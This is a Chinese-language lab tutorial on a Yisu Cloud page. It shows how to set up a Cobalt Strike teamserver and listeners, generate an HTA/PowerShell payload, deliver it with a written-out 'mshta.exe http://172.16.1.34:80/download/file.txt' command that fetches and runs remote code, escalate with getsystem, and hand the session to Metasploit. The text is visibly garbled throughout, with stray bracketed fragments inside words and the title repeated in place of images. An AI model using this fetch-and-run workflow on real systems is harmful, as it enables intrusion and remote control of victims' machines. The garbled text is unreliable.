溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何使用cobaltstrike接口傳遞msf中的shell

發(fā)布時(shí)間:2021-12-18 10:05:58 來源:億速云 閱讀:350 作者:小新 欄目:網(wǎng)絡(luò)管理

這篇文章主要介紹如何使用cobaltstrike接口傳遞msf中的shell,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

Cobalt Strike 一款以Metasploit為基礎(chǔ)的GUI框架式滲透測試工具,集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,自動(dòng)化溢出,多模式端口監(jiān)聽,exe、powershell木馬生成等。功能挺多,文章只是講了工具的核心功能

滲透機(jī):kali,靶機(jī):ws08。

kali:172.16.1.34

ws08:172.16.1.24

如何使用cobaltstrike接口傳遞msf中的shellagscript            拓展應(yīng)用的腳本

clint                  檢查profile的錯(cuò)誤信息

teamserver      服務(wù)端程序

cobaltstrike      客戶端程序

cobaltstrike.jar(java跨平臺(tái))客戶端

logs                  目錄記錄與目標(biāo)主機(jī)的信息

third-party         第三方工具

啟動(dòng)服務(wù)器

執(zhí)行./teamserver 172.16.1.34 p@ssw0rd

如何使用cobaltstrike接口傳遞msf中的shell不要關(guān)閉窗口,然后本機(jī)啟動(dòng)cobalt strike連接測試客戶端連接

如何使用cobaltstrike接口傳遞msf中的shell枚舉用戶

如何使用cobaltstrike接口傳遞msf中的shell用戶通信

/msg Ro0t xxxxxx

如何使用cobaltstrike接口傳遞msf中的shell上面是啟動(dòng)和操作方法,下面看下cobaltstrike監(jiān)聽模塊

Beacon為cs內(nèi)置監(jiān)聽器,需要在目標(biāo)機(jī)上執(zhí)行相應(yīng)的payload,獲取shell到cs中。包含了smb,DNS, HTTP等模塊

如何使用cobaltstrike接口傳遞msf中的shell=============================================================

windows/beacon_http/reverse_dns_txt

windows/beacon_http/reverse_http x86/x64

模塊有很多,這里不列舉了

foreigh為與外部相結(jié)合的監(jiān)聽器,主要用于msf結(jié)合,比如獲取meterpreter到shell中

=============================================================

在cobalt strike中添加一個(gè)Listener,創(chuàng)建beacon Listener

如何使用cobaltstrike接口傳遞msf中的shell創(chuàng)建Foreign Listener

如何使用cobaltstrike接口傳遞msf中的shellsave,在主配置菜單中依次點(diǎn)擊,Attack,packages,HTML Application

如何使用cobaltstrike接口傳遞msf中的shell選擇Listener生成與方法,有powershell,vba以及exe三種可執(zhí)行文件

如何使用cobaltstrike接口傳遞msf中的shell選擇ps,保存到桌面上、

如何使用cobaltstrike接口傳遞msf中的shell依次點(diǎn)擊Attacks,webdirve-by,hostfile、通過web服務(wù)打開連接通道

然后再彈出的窗口中找到文件一欄,點(diǎn)擊文件夾按鈕,找到需要添加的惡意腳本.hta、添加完后點(diǎn)擊launch啟動(dòng)web服務(wù)模塊

如何使用cobaltstrike接口傳遞msf中的shell此時(shí)我們查看日志信息提示我們在靶機(jī)客戶端訪問連鏈接

如何使用cobaltstrike接口傳遞msf中的shell回到靶機(jī),打開終端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令

kali查看,新連接已經(jīng)建立起來了

如何使用cobaltstrike接口傳遞msf中的shell默認(rèn)情況下此處鏈接有60s的心跳線,為避免流量過大可以適當(dāng)調(diào)整間隔。

如何使用cobaltstrike接口傳遞msf中的shell右擊會(huì)話選擇interact打開交互會(huì)話終端

可以查看下當(dāng)前權(quán)限,可以使用getsystem提權(quán)試試。

如何使用cobaltstrike接口傳遞msf中的shell打開一個(gè)新的終端,進(jìn)入msf設(shè)置一個(gè)監(jiān)聽載荷,lhost設(shè)置成本地ip,然后expliit -j

回到cobalt里,右擊spawn生成新的listener。然后在彈出的窗口中點(diǎn)擊add添加一個(gè)新監(jiān)聽器

此時(shí)監(jiān)聽設(shè)置完,然后進(jìn)入msf終端來傳遞cobaltstrike的shell

如何使用cobaltstrike接口傳遞msf中的shell回到msf可以發(fā)現(xiàn)已經(jīng)和靶機(jī)建立起了會(huì)話

如何使用cobaltstrike接口傳遞msf中的shell如何使用cobaltstrike接口傳遞msf中的shell

以上是“如何使用cobaltstrike接口傳遞msf中的shell”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI